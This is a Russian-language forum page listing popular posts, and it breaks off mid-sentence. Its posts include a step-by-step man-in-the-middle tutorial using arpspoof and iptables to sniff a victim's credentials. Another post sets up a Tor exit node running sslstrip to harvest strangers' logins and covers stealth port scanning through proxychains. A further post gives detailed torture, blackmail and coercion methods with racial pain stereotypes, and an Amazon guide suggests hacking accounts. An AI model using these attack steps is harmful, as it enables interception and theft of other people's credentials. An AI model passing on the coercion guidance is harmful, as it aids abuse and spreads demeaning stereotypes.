Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 6 февраля 2026
-
Год
6 февраля 2025 - 6 февраля 2026
-
Месяц
6 января 2026 - 6 февраля 2026
-
Неделя
30 января 2026 - 6 февраля 2026
-
Сегодня
6 февраля 2026
-
Пользовательская дата
21.04.2022 - 21.04.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 21.04.2022 в Сообщения
-
1 баллБрал самую дорогую , вместо ящика была полицейская машина , а а багажнике был ПМ и 20.000$ , пока не могу сказать настоящие или нет, потому что очень сильно похожи на оригинал , но в банк с ними идти боюсь
-
1 баллО продолжительности пыток: «Если в запасе много времени, гуманнее и эффективнее задействовать мало-помалу нагнетаемое давление на психику в сопровождении телесной боли, когда же времени почти что нет – проще воспользоваться примитивным физическим насилием». Об отношении к боли представителей различных характеров, рас и национальностей: цыгане, негры, китайцы и злостные профессиональные преступники пониженно воспринимают боль, а многие народы Севера (чукчи, якуты, эвенки) и голубоглазые светловолосые европейцы - переносят ее очень плохо; болтливые субъекты устойчивее к боли, чем ассоциалы; наркоманы, не находящиеся под влиянием наркотика, мучительно переживают боль; сильные эмоции (гнев, горе, ненависть) обычно приглушают боль; при ожидании болевого ощущения чувствительность на боль заметно повышается, особенно если субъект весьма ее не любит либо является трусом». О степени и признаках боли, влиянии на неё времени суток: значительная боль легко и надолго запоминается; острее всего боль испытывается ночью (при максимуме в 1 час ночи), слабее - днем, еще слабее - вечером; в особенности чувствительны к воздействию: пульпа зубов, глазные яблоки, область подмышек, кожа век, кости ключиц и пах; о том, что человек переживает мучительную боль обычно говорят cтиснутые зубы либо пронзительные крики и стоны, выпяченные глаза, расширенные ноздри, обильный пот, сильные расстройства кровообращения и дыхания (при затруднениях с последним багровеет лицо); когда боль длится слишком долго, возможны также бледность кожи, упадок сил, дрожь и, в конечном счете, обморок; знаком реальности испытываемого страдания надо считать не крики, а значительное расширение зрачков (при явной симуляции они заметно не меняются). Любое пыточное воздействие должно быть точно дозируемым, т.к., когда объект лишается сознания, оно становится бессмысленным. Для преодоления этой неприятности жертву окатывают холодной водой и вводят ей фармакостимуляторы». Пытают, при этом, по-разному: пропускают через отдельные части тела жертвы электрический ток; давят на психику при помощи сенсорной депривации в сочетании с физическим дискомфортом наподобие холода, голода и жажды, лишения сна; избивают; не брезгают отрезанием конечностей. Так как на палачей в ФСБ и других спецслужбах никого специально не учат, то и пытки являются производными от армейских, тренировочных. Хотя, спасает жертву это далеко не всегда. Между тем, сотрудники спецслужб считают особым шиком расколоть подозреваемого без каких-либо дополнительных усилий: шантажом, запугиванием и зомбированием. Иногда подозреваемый сдаётся уже на этапе запугивания – неудивительно, учитывая, что одним из методов называют отрезание пальца… или мочки уха, например. С шантажом тоже всё достаточно просто – компромат можно найти практически на каждого. Да и подбросить, как это часто показывают своим примером полицейские, не проблема. Но и по нему имеется чёткая инструкция: продемонстрировать серьезность и документированность компромата; уверить человека в твердой решимости задействовать этот компромат, если объект будет артачиться; убедительно доказать ему, что этому сообщению поверят; доступно описать реальные последствия поспешного неосмотрительного отказа; сообщить объекту, как он мог бы попытаться защититься, и почему это бессмысленно (т.е. "убить надежду"); предельно ограничить вариативность его выбора; давить фактором времени; подстраховаться дополнительным свежим компроматом. Факты обычно предъявляют: внезапно (ошарашивая объект); поочередно (по степени нарастания их силы). При предъявлении каких-то документов лучше всего демонстрировать их копии, чтобы субъект внезапно не изъял (с уничтожением) оригиналы. При отсутствии реальных документов можно блефовать, сообщая, что они имеются в наличии (хотя, если субъект уверен, что их нет, такие заявления лишь усилят вероятное сопротивление), либо конкретно указать их местонахождение, произнеся с усмешкой, что он может попробовать изъять этот компромат (это довольно эффективно, т.к. производит впечатление, что шантажирующий уверен в своих силах). Всегда остерегайтесь блефовать, если на этом могут поймать. При использовании предполагаемых фактов манипулировать необходимо предельно осторожно, реально ограничиваясь намеками и шуткам с внимательным отслеживанием реакций объекта. Довольно перспективно "раскачивание" человека намеками на некий очень вероятный, но совсем не явный факт; к решительному прессингу при этом переходят лишь после появления соответствующей реакции объекта. В предъявляемом наборе щекотливых материалов, предполагаемое надо размещать между вполне надежным. Активно оперируя умело сфабрикованными фактами, можно и не скрывать, что это - фабрикация, а иной раз утверждать, что это - истинная правда. Важно продемонстрировать взаимосвязь поддельного и подлинного и указать на невозможность обоснованного отрицания "фактуры", а также на то, что все воспримут материал именно так, как полагает шантажирующий. Объект может без промедления оценить правдивость сообщенного либо впрямую, либо позвонив по телефону. Добившись согласия объекта на сотрудничество, надо тотчас же задокументировать этот факт (видео- и аудиозапись, расписка, фотография) и (в частности, при сфабрикованной фактуре) попробовать разжиться у него добавочной компрометацией на самого себя либо авторитетных лиц в качестве свидетельства искренности согласия». А вот как описывают один из стандартных способов зомбирования: «Человека необходимо перевести из прежней (комфортной) среды обитания в новую (чужую и дискомфортную). Контакты с прежней полностью заблокировать. Режим дня при этом тоже меняется на самый неудобный субъекту. Окружающие должны вести себя по отношению к нему предельно неадекватно, вызывая максимум недоверия (доносы, угрозы, ложь, высмеивание всех ценностей субъекта). Новое питание должно быть преимущественно углеводным и безбелковым, с подмешиванием притупляющих сознание препаратов (к примеру, аминазина). Недосып обязателен. Как только субъект достигнет состояния тупого безразличия, следует провести необходимое кодирование его разума гипнозом либо другими методиками активного внушения». По сути, подобное зомбирование тоже можно охарактеризовать, как пытку, только куда более продолжительную, чем обычные. Её целью служит превращение обычного человека в доносчика.
-
1 балл
-
1 баллПриветствую тебя, дорогой читатель. Уже не раз я радовал тебя серыми и чёрными схемами, с помощью которых с минимальными вложениями, можно зарабатывать неплохие деньги в интернете. Но в данной статье способ будет абсолютно белым (хотя и с применением некоторых, совсем совсем легоньких серых ниточек). Что же ты знаешь про Amazon, мой юный читатель? Некоторые не знают, наверное, вообще ничего. Слышали краем уха от соседа и то давно. Некоторые представляют себе америкосский вариант алиэкспресса, но мало кто знает, что это крупнейшая площадка для ведения онлайн бизнеса. В данной статье мы рассмотрим абсолютно легальный способ заработка, размер которого будет реально зависеть от ваших мозгов и приложенных усилий. Итак, речь пройдет о проекте Merch от Amazon. Данный проект был запущен примерно 2.5 года назад и набрал большой интерес со стороны забугровых интернет дельцов, не обошел он стороной и Россию. Но после резкого роста спроса на работу в данном проекте, процедуру регистрации там усложнили до жесточайших ограничений (некоторые люди ждут заветного письма по полгода). Чем же всех так манит этот проект? Всё просто - там можно очень хорошо зарабатывать, продавая продукцию амазона с нанесением своих дизайнерских макетов. Данная схема работы называется POD (Print on Demand – технология выпуска продукции, по требованию покупателя)! Тоесть вам не нужно ничего изготавливать, отправлять, общаться с клиентами тд. и тп. Вам просто нужно наваять кучу дизайнерских принтов, придумать свой бренд и начать размещать товары с нанесением вашего дизайна на Амазоне. Сколько на этом можно заработать? Роялити одной проданной футболки, ценой в 20$ составляет порядка 5.5$ вашей прибыли, кажется, что сумма не велика? Вот пример одного из участников который за несколько месяцев вышел на очень серьёзную оборотку: За 5 месяцев один из участников проекта вылез с 20$ до 6000$ Заканчивая вводную часть, я скажу, что это далеко не самый топовый заработок в данной сфере. С чего начать? Первый и самый важный момент — это процедура регистрации. Скажу сразу - если вы просто, от балды, попробуете зарегистрироваться, то в 90% случаев вы будете месяцами ждать ответа или получите отказ в регистрации. После получения отказа вы можете попытаться пройти регистрацию вновь: Оптимально пройти регистрацию в данном сервисе можно по следующему алгоритму. Заполняем всю анкету 2. Для регистрации из СНГ нам понадобиться счёт в системе Payoneer (Привязать счет банка РФ, БР, УКР не удастся!) Регистрация на Payoneer занимает до 3х дней, поэтому подготовьтесь заранее. 3. На странице банковских реквизитов вы вводите данные из своего кошелька Payoneer: Данные для заполнения берём из аккаунта Payoneer: После заполнения данных о платежной системе, для получения выплат от амазона вам необходимо пройти налоговое интервью. Информацию о нём вы можете найти здесь. Указываем, что не являемся агентом (чужих авторских прав): Если у вас нет ИНН то указываем как на схеме, а если есть ИНН то выбираем второй пункт: Зачем указывать ИНН? Объясняю, не указав свой ИНН, Вам придется платить 30% налога с продаж в казну США!!! Соглашаемся на электронную подпись: Ещё раз подтверждаем, что мы не гражданин США: Ставим свою электронную подпись: Ещё парочка подтверждений: Если всё прошло хорошо, то вы получите следующее сообщение: После этого нам останется последний шаг — это заполнение формы заявки на участие в проекте Merch Amazon В ней мы выбираем сферу деятельности (Novelty T-shirt Business) Далее пишем название вашей компании и переходим к последней (а скорее самой важной части) Для быстрого прохождения регистрации в данном сервисе нам понадобиться Сайт с регистрацией домена более 3х месяцев Аккаунт с пабликом в фейсбуке, обязательно наполненный контентом (можно попросить у друзей, можно купить) Аккаунт вк с пабликом (так же необходимо чтобы он был заполнен контентом по тематике продажи футболок и прочей продукции с уникальными принтами пример и ещё пример) как добыть аккаунты я думаю все знают, от покупки до взломов, не забывайте наша цель – чтобы одобрили регистрацию! Парочка аккаунтов Insta (либо прокачать через сервисы массфоловинга и масслайкинга, либо купить) Зарегистрироваться на соседних POD площадках, разместить там несколько дизайнов и указать ссылку в форме заявки (да Амазон не единственная площадка, работающая по данной схеме, но она самая жирная в плане трафика) список площадок: Redbubble Teepublic DesingByHumans Society6 Zazzle Spreadshirt Все эти ссылки указываем в поле дополнительной информации! Если вы всё сделали правильно, то регу вам одобрят в течении 5-10 дней и вы получите ваше письмо счастья: Если всё удалось, то это не значит, что вы заливаете пару принтов и начинаете зарабатывать тонну бабла, это значит, что теперь вам предстоит трудиться. Оптимизация продаж и хаки Как работает амазон? У любого товара на амазоне есть собственный рейтинг. Работает это таким образом – чем больше товар продается, тем ниже рейтинг в цифрах. Данный рейтинг называется BSR (Bestseller rank), соответственно вам необходимо проанализировать направления дизайнов, которые продаются лучше всего. Авторские права. Очень важный момент не использовать какие-либо материалы, защищенные авторскими правами, поэтому рекомендуем вам проверять вашу продукцию на сервисах антиплагиата перед размещением. Вот один из них это позволит вам избежать различных неприятностей. Исследования и выбор ниши – один из важнейших пунктов к тому, чтоб ваш товар успешно продавался, а вы соответсвенно обогащались. Для этого необходимо провести аудит поисковых запросов на амазоне, например вы хотели тематику, ну пусть будет цирковая, соответственно в поисковике амазона мы вбиваем circus t-shirts (или тот вид продукции, который вам интересен). Там мы находим товар с BSR 100-300 тысяч (то есть очень редко продающийся). Соответственно, разместив более привлекательный дизайн на подобном товаре, вы сможете вылезти среди конкурентов в данном сегменте! Проведя исследования, мы переходим к созданию собственного дизайна. Отделаться 5-10 вариантами дизайна даже не расчитывайте. Продаж на них у вас будет очень мало, поэтому, оптимально собрать реестр дизайнеров с fl.ru, разослать им техническое задание с идеями дизайна (которые у вас возникли в ходе исследования) и, соответственно, приобрести оригиналы наиболее крутых вариантов. Со временем вы наработаете мощную базу дизайнеров и сможете увеличить количество принтов на вашем аккаунте продавца! Выбор продукции для размещения вашего дизайна. Не стоит ограничивать себя только одним видом продукции (например футболками). Для этого существует специальный сервис, интегрируемый с Amazon под названием Shopify. Там мы получаем триал период для бесплатного использования Листаем страницу до приложения teelaunch Данное приложение автоматически обнаруживает заказ, печатает его и отправляет клиенту. Всё происходит автоматически без вашего участия! Данный сервис платный, но он стоит своих денег. В приложении есть редактор для размещения вашего дизайна на продукции. Разрешение принтов необходимо делать в высоком качестве. 4500х4500 будет в самый раз. После того как вы собрали свой модельный ряд в конструкторе, вам необходимо подключить аккаунт Shopify к Amazon Идёте в меню Shopify и выбираете add sales chanel Важно: Если у вас нет аккаунта продавца, зарегистрируйтесь. Вам будет действительно необходим профессиональный аккаунт продавца за 39.99$ в месяц для того, чтобы вся описанная схема работала. Примите требования Amazon и всё готово к продаже: После интеграции, заходим в приложение амазон и отправляем выбранные товары на продажу Обязательно пишите подробное описание товара и информацию о вашем бренде Запомните! Прежде, чем вы начнете продавать свои футболки на Amazon, вам нужно нажать «Apply to sell in this category» («Отправить заявку на продажу в данной категории»). Процесс подачи заявки заключается в ответах на несколько вопросов. После чего вы МОМЕНТАЛЬНО получаете доступ к категории. Также, вам потребуется сделать отдельные страницы для мужских и женских футболок. Мне эта особенность даже нравится, поскольку она позволяет более целенаправленно использовать метод ключевых слов. Для оптимизации продаж необходимо запомнить несколько основных правил: Управление ценой - вам всегда необходимо мониторить цены конкурентов, чтобы ваш товар был интересен покупателям Бренд и название. Используйте брендирование ваших товаров, а особо обращайте внимание на название. Чем больше ключевых слов вы используете в названии, тем больше шансов, что ваш товар будет выделен среди товаров конкурентов Описание. Обязательно используйте этот раздел, так как он влияет на поисковую выдачу в гугле! Увеличивайте охват за счет добавления новых товаров. В неделю необходимо добавлять от 10 и более товаров Добавляйте больше различных товаров, экономя на линейке размеров и цветов, так как на первом этапе амазон выставляет квоты на размещения до 100 товаров Тщательно следуя пунктам, описанным в данной статье, и методике регистрации, вы сможете выйти на заработок более 5000$ за 3-4 месяца. Стартовые вложения на запуск подобной торговли на амазон составят всего 200$, а если вы сам занимаетесь дизайном то и меньше.
-
1 баллНачнем по порядку. Установка и запуск WireShark WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой: sudo atp-get install wireshar После установки запустим утилиту. Можно запустить с помощью команды: sudo wireshark Интерфейс wireshark Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока. Разделения интерфейса после запуска блок - настройка и управления утилитой. блок - пакеты, которые были перехвачены. блок - информация для расшифровки и получения данных с пакетов. Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены. Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры: 1. ip.proto - протокол 2. ip.src - отправитель 3. ip.dst - получатель 4. ip.addr - любой адрес Фильтры поддерживают использование логических операторов и выражений: == - присваивание || - логическое или & - логическое и > - больше < - меньше На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet". Пример перехваченного пакета Сбор информации Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее. sudo netdiscover После этого получаем информацию об участниках сети. Участники сети Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле: fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt Информация об участниках в файле Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой: ip.addr==192.168.0.100 Фильтрация по IP Или, например, фильтрация по MAC-адресу: eth.addr==68:3e:xx:xx:xx:xx Фильтрация по MAC-адресу Можно комбинировать запросы логическим «или» - ||: eth.addr==68:3e:xx:xx:xx:xx || igmp Комбинирование двух разных запросов MITM-атака Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке: MITM-атака Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex: sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен. echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282 Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать: arpfpoof -i <interface> -t <жертва> <шлюз> Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид: arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1 Далее с фильтрами и другими данными информация анализируется в WireShark. Заключение Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.
-
1 баллЕсли ты считаешь, что Tor — это исключительно средство для обеспечения приватности в сети, то ты неправ дважды. Во-первых, его распределенную сеть можно использовать в разных целях. А, во-вторых, не так уж безопасен черт, как его малюют. Увы. Замечательный инструмент для обеспечения анонимности и сохранности данных в сети хорош по многим причинам. Сразу остаются не у дел любые сниферы, в том числе установленные и на интернет-маршрутизаторах, потому как весь трафик передается через цепочку узлов исключительно в зашифрованном виде. Крайне затруднительно или, если полностью поверить разработчикам, то даже невозможно становится отследить источник отправки данных благодаря постоянно меняющимся цепочкам специальных узлов-посредников, через которые передаются данные. Кто не пробовал использовать Tor, чтобы банально сменить свой IP? Минус на первый взгляд один — скорость работы. Каждый из нодов, входящих в цепочку, вносит серьезную задержку, как по времени отклика, так и банально по ширине канала. В результате получаем анонимное соединение. Анонимное и модемное :). Но диалапный коннект — это не самая главная проблема активных пользователей Tor. Гораздо сильнее их должно волновать, что любые данные можно перехватить и, черт подери, сделать это просто! Откуда берутся… ноды Чтобы пустить трафик приложения через Tor, достаточно указать в настройках прокси — адрес локального SOCKS-сервера. В случае, если такой возможности не предусмотрено можно использовать соксофикатор (например, Sockcap), но помнить при этом, что через сокс можно пустить только TCP-трафик. Впрочем, для большинства пользователей намного более интересны будут готовые сборки (так называемые Bundles), включающие сам Tor, а также преконфигурированные браузер Firefox и IM-клиент Pidgin. Поставил и все работает! Кстати говоря, для большего удобства для Firefox’а реализован плагин Torbutton. Щелкнул — и весь безопасно трафик уже передается через цепочку промежуточных узлов. Что вообще представляют собой эти узлы и как в принципе устроен Tor? Попробуем разобраться. В основе лежит распределенная система узлов — так называемых нод, между которыми в зашифрованном виде передаются данные. Для соединения обычно используется три сервера, которые образуют временную цепочку. Каждый сервер выбирается случайным образом, при этом он знает только то, от какого звена получил данные и кому они предназначаются. Мало этого — цепочки постоянно меняются. Даже в случае перехвата данных на одном из серверов отследить полный маршрут пакетов (в том числе и их отправителя) не представляется возможным. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. Где зарылась собака? Итак, маршрут постоянно меняется, данные через промежуточные узлы проходят в виде белиберды, т.е. в зашифрованном виде — где подвох? Он есть. Ведь, как серьезно бы ни защищались данные, как изощренно не выбирался и запутывался маршрут, где-то на выходе данные все равно нужно расшифровывать. Ведь только так их можно доставить до места назначения. Эта операция осуществляется на последней ноде в цепочке — так называемой выходной нодой (Exit Node). Если на таком узле установить снифер, то данным ничего больше не останется, как прямиком попасть в логи :). Ты можешь подумать, что система такого положения дел не допускает и поднять Tor для работы выходной ноды нельзя? Запросто! Вся система строится на большом количестве энтузиастов, участвующих в проекте и предоставляющие свои домашние компьютеры как ноды, и в том числе выходные. Несколько строчек кода в конфиге —твой билет их ряды. Да здравствует Exit node! Ну что ж, приступим. Для экспериментов нам понадобится любой никсовый дистрибутив, пускай даже это будет Backtrack, запущенный с флешки, или Ubuntu на виртуальной машине — это совершенно не нужно. Далее потребуется последняя версия Tor (на момент публикации — 0.2.1.19). Любители GUI также могут скачать и установить Vidalia — мы же будем работать в консоли. Итак скачиваем пакет, распаковываем и устанавливаем. Я думаю на этой стадии никаких проблем быть не должно. Для Tor’а важно, чтобы часы были установлены точно. В противном случае — синхронизируем с публичными серверами времени. Забегая вперед скажу, что для запуска Tor лучше создать отдельного пользователя — делается это командой adduser. Я создал себе пользователя toruser: uid=111(toruser) gid=10(wheel) groups=0(wheel),10(wheel). Теперь нужно создать файл конфигурации. Tor использует для хранения своих данных папку .tor в домашней директории пользователя (/home/toruser). Создаем папку .tor, создаем в ней файл torrc и открываем его в текстовом редакторе. Нас интересует несколько параметров : ControlPort – на этом порту Tor будет принимать подключения для управления Tor-сервером (т.е. можно подключиться удаленно для конфигурации Tor’а, опция важна для тех, кто использует графические оболочки типа Vidalia или Tork). Устанавливаем его в 9051. DirPort – на этом порту Tor будет принимать данные от сервера директорий. Устанавливаем в 9030. ControlPort 9051 DirPort 9030 ExitPolicy – определяет, какой трафик мы будем принимать и форвардить. Имеет формат "ExitPolicy Accept | reject address:port". По умолчанию политика следующая: reject *:25 reject *:119 reject *:135-139 reject *:445 reject *:563 reject *:1214 reject *:4661-4666 reject *:6346-6429 reject *:6699 reject *:6881-6999 accept *:* Означает, что мы будем резать трафик, направленный на вышеперечисленные порты, а весь остальной будем пропускать. В принципе можно ее и не переопределять и оставить дефолтной, ну это уж на твой выбор. Я использовал следующую: ExitPolicy accept *:80, accept *:443, accept *:110, accept *:143, accept *:993, accept *:995, reject *:* HashedControlPassword – хеш пароля для доступа и конфигурации Tor-сервера (чтобы никакой злобный хакер не смог переконфигурировать наш сервер), создается при помощи команды: tor —hash-password. Nickname – имя нашего сервера. ORPort – порт, ожидающий подключения от других нодов. SocksListenAddress — адрес, по которому Tor будет ждать подключений от приложений, работающих через SOCKS. Формат: SocksListenAddress IP[:PORT] Установим IP в 127.0.0.1, а порт оставим дефолтным (9050). Это понадобится нам, если мы захотим использовать Tor в связке с Privoxy или другими прокси. HashedControlPassword 16:91495A0B7CBC41C76073E1EC00A5CF1510D41462884391CCB24BF489F1 Log notice stdout – выводить сообщения в консоль Nickname HelloXakep ORPort 9001 SocksListenAddress 127.0.0.1 Сохраняем изменения и закрываем файл. Можно приступать к запуску. Открываем консоль, логинимся под toruser и запускаем Tor, передав в качестве параметра путь до конфиг-файла: $ tor -f /home/toruser/.tor/torrc И смотрим выдаваемые сообщения. Как только сервер сможет подсоединиться к сети, он попытается определить доступность своих портов снаружи. Это может занять до 20 минут. В логах появятся сообщения вида "Self-testing indicates your ORPort is reachable from the outside. Excellent". Если таковых нет, это значит,что сервер недоступен из Сети — тогда следует перепроверить файрволл. Как только сервер определит доступность, он загрузит на сервер директорий (базу нод) свой дескриптор. Это позволит клиентам узнать адрес, порты, ключи и другую информацию о нашем сервере. Можно зайти на http://moria.seul.org:9032/tor/status/authority и найти там nickname своего сервера, чтобы убедиться, что он будет использоваться клиентами. Правда,обновляется он не моментально — иногда может потребоваться некоторая время,чтобы эта информация в базе обновилась. Вот и появился наш сервер в списке. Посмотрим на строчку ниже HelloHacker. Что мы видим: s Exit Fast Running V2Dir Valid. Exit — означает, что мы являемся Exit Node! Ловись-ловись, рыбка. Итак, выходная нода настроена, запущена, добавлена в базу — кто-нибудь обязательно ею воспользуется уже в самое ближайшее время. Что ж, остается только запустить любимый снифер Wireshark, выбрать Интерфейс, смотрящий во внешнюю сеть и включить захват пакетов. А дальше нужно чуть подождать. В большинстве случаев пакеты начинают сыпаться в логи уже очень скоро :)) После этого можно отключить захват и проанализировать полученный дамп (например, осуществить поиск строки pass в пакетах). Как ты знаешь HTTP-протокол передает все в открытом виде, так что может попасться что-нибудь интересное (мне за 40 минут работы попались 2 логина и пасса к забугорным трекерам). Согласись, неплохо. Но все же самое вкусное пролетает мимо нас (вернее проходит то оно как раз через нас, но зашифрованным). Но и тут есть выход. Скачиваем sslstrip и устанавливаем. Запускаем: $ python sslstrip.py -a -l 8080 -w today.log Так как мы являемся последним узлом, то трафик от предыдущего узла передается зашифрованным, расшифровывается на нашем сервере и уже потом отправляется конечному адресату. Итак, нам необходимо пропускать исходящий http трафик через sslstrip. Для этого добавим в iptables такое правило: $ iptables -t nat -I OUTPUT -p tcp -m owner -uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080 где 111 — id пользователя toruser. Иными словами, мы задаем, чтобы весь исходящий HTTP-трафик пользователя toruser шел на sslstrip. Все, теперь процесс полностью автоматизирован, а нам осталось только ждать. А потом проверять логи. Анонимное сканирование. Перехватывать чужие логины и пароли мы научились. А вот задачка поинтересней. Сталкивался ли ты c ситуацией, когда ты находишься во внутренней сети, а посканировать интересующий тебя сервак нельзя, потому как это тут же привлечет внимание IDS и соответственно админа. Или вот еще вариант: ты сканируешь удаленный хост, а он распознает сканирование и блокирует твой айпишник. Неприятные ситуации. Но и из них есть выход! Нам опять поможет Tor, который можно использовать в качестве посредника для сканирования. Ведь, кто говорил, что эта система можно использовать только для анонимного серфинга? В чем преимущество такого сканирования? В нашем первом случае сканирование сервера будет происходить из инета, а не из локальной сети. А во втором, даже если нас заблокируют, мы всегда сможем пустить трафик через другой Tor-сервер,благо их хватает. Итак, для наших экспериментов нам понадобится: Tor — у нас уже установлен и настроен Privoxy (www.privoxy.org) proxychains (proxychains.sourceforge.net) tortunnel(www.thoughtcrime.org/software/tortunnel) Nmap (nmap.org) Устанавливаем, все, кроме tortunnel. Заходим в конфиг proxychains и, чтобы пустить трафик через Tor, раскомментируем строчку: Socks4 127.0.0.1 9050 Сохраняем и запускаем сканирование (адрес 92.241.175.142 ): "proxychains nmap -PN 92.241.175.142". На первый взгляд это кажется быстрым и эффективным способом сканирования, но это не так. При дефолтном SYN-сканировании пакеты через Tor не пойдут. Таким образом мы бы сканировали сервер напрямую и, возможно, спалились бы. Хорошо — попробуем по-другому, посмотрим, какие еще техники сканирования предлагает Nmap: "SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans". Укажем Nmap использовать сканирование с полным соединением: "proxychains nmap -sT -PN 92.241.175.142" Поздравляю! Вот теперь мы сканируем через Tor-сеть. Правда что-то долго. А все потому, что наши пакеты проходят через три узла прежде, чем достигнуть цели,причем эти узлы могут быть не самые быстрые на планете. В случае сканирования целой подсети, процесс может затянуться на часы или даже дни. Кроме того, такое сканирование все еще не является анонимным, так как перед сканированием Nmap посылает icmp запросы (идущие напрямую от нашей машины), чтобы проверить доступность удаленной машины. Что ж, придется резать файрволом весь исходящий трафик, идущей к этой машине не через Tor или просто указать опцию -PN Nmap’у (чтобы он не проверял доступность удаленной машины): "iptables -A OUTPUT -dest 92.241.175.142 -j DROP". Я указываю везде опцию -PN, так как фаервол на xakep.ru рубит ICMP_трафик, поэтому я вручную указываю, что хост жив. Прокачиваем скорость. А как же быть со скоростью? Ведь с такой скоростью много не посканируешь, что лишает смысла все наши изыски. Тут нам поможет утилита torrtunnel. Она служит для того, чтобы пускать трафик сразу через выходной узел, минуя два предыдущих. И в данной ситуации скорость сканирования зависит только от того, какой последний нод ты выберешь. Для установки утилиты потребуются дополнительные библиотеки boost. Скачиваем последнюю версию библиотек с сайта www.boost.org. Распаковываем, заходим в папку и выполняем: $ bootstrap.sh --libdir=/usr/lib --includedir=/usr/include $ ./bjam --prefix=/usr $ ./bjam install После этого, заголовочные файлы должны оказаться в /usr/include/boost, а библиотеки в /usr/lib. Теперь надо вручную создать символическую ссылку на библиотеку libboost_system.so.1.40.0 (может кому и не понадобится, но у меня она при установке автоматически не создалась): $ ln -s /usr/lib/libboost_system.so.1.40.0 /usr/lib/libboost_system-mt.so После этого можно компилировать и устанавливать tortunnel. Запускаем torproxy — она выдает: torproxy <torExitNodeHost>. Теперь нужно выбрать подходящий exit node. Для это идем сюда http://128.31.0.34:9031/tor/status/all или сюда http://moria.seul.org:9032/tor/status/authority и ищем узел с описанием "Exit, Fast, Stable, Valid". Так обозначаются надежные и быстрые ноды — именно такие нам и нужны. Далее копируем айпишик и выполняем: "./torproxy [ExitNodeIP]" Теперь, для того чтобы все заработало, нужно через конфиг указать proxychains использовать socks5. Итак, комментируем строку Socks4 127.0.0.1 9050 в /etc/proxychains.conf и добавляем socks5 127.0.0.1 5060 (5060 –порт, который будет слушать tortunnel) После этого можно запустить и Nmap: @proxychains nmap -sT -p 80,443,21,23 92.241.175.142 Как ты видишь, скорость сканирования увеличилась (если нет – попробуй другой нод). Теперь можно даже просканировать свою собственную машину. В довершении научим Privoxy работать через tortunnel. Тем самым мы снизим уровень анонимности (одна промежуточная нода вместо трех), но получим более шустрый серфинг. Заходим в файл конфигурации и добавляем строчку: forward-socks5 / 127.0.0.1:5060 Теперь открываем лиса и настраиваем http-proxy на 127.0.0.1:8118. После этого идем на TorCheck at Xenobite.eu 0 проверять, действительно ли мы серфим через Tor, если все ок — то отобразится страница с надписью "Your IP is identified to be a Tor-EXIT.". Вот и все, теперь можно провести и ручной аудит удаленной системы. Tor Scanner. Ну вот, мы и заставили Tor работать на себя. Можем сканировать через Tor, перехватывать чужие пароли. А что если нам самим понадобится использовать Tor чтобы, например, на Gmail зайти? Как не попасть в логи sslstrip’a? Выход есть! В пакете tortunnel есть утилита torscanner, предназначенная для поиска Exit Node’ов, использующих sslstrip. Работает она следующим образом: мы передаем программе URL страницы, содержащей https ссылку(и), после чего она напрямую соединяется со всеми Exit Node’ами и запрашивает указанную страницу. Полученные данные выводятся в консоль, но можно перенаправить вывод в файл, для дальнейшего изучения. Синтаксис для запуска — "torscanner destinationHost destinationPort request". Например: $ torscanner www.google.ru 80 / > 1.txt Если проанализировав файл 1.txt в ответах одного и серверов ты обнаружишь подмену HTTPS на HTTP, то на сервере однозначно работает sslstrip. Torscanner сканирует все выходные узлы, что занимает достаточно много времени. Но я думаю, что ты сумеешь модифицировать программу таким образом,чтобы она 